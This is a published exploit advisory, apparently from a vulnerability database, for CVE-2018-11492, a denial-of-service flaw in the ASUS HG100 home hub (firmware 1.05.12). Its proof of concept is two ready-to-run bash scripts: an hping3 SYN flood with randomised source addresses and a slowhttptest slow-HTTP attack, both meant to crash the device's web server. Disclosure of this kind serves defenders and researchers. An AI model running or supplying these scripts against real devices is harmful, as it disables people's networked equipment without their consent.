ASUS HG100 Denial Of Service

2019.04.18
Credit: Yint Wang
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-noinfo


Ogólna skala CVSS: 7.8/10
Znaczenie: 6.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Brak
Wpływ na dostępność: Pełny

# Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS # Date: 2019-04-14 # Exploit Author: YinT Wang; # Vendor Homepage: www.asus.com # Version: Hardware version: HG100 、Firmware version: 1.05.12 # Tested on: Currnet 1.05.12 # CVE : CVE-2018-11492 1. Description The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492). 2.Proof of Concept Just Execute the following script in kali which could crash the devices 1. IPv4 packet and in result of devices crash.which written in linux script. #needed to co-operate with hping3 tool #with the time period at least 220s which could cause web server of HG100 devices crash #!/bin/bash read -p "enter the ip of HG100 here " url hping3 -V -c 10000 -S -w 64 --flood --rand-source $url sleep 220 echo "Hping3 –V –c 10000 –S –w 64 –flood –rand-source $url time 220s" exit 0 2.Slowhttp test and caused the devices crash.which written in linux script. #needed to co-operate with slowhttptest tool #with the time period 600s which could cause web server of HG100 devices crash #!/bin/bash read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url slowhttptest -H -R -c 10000 -l 600 -u $url sleep 600 echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s" exit 0


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top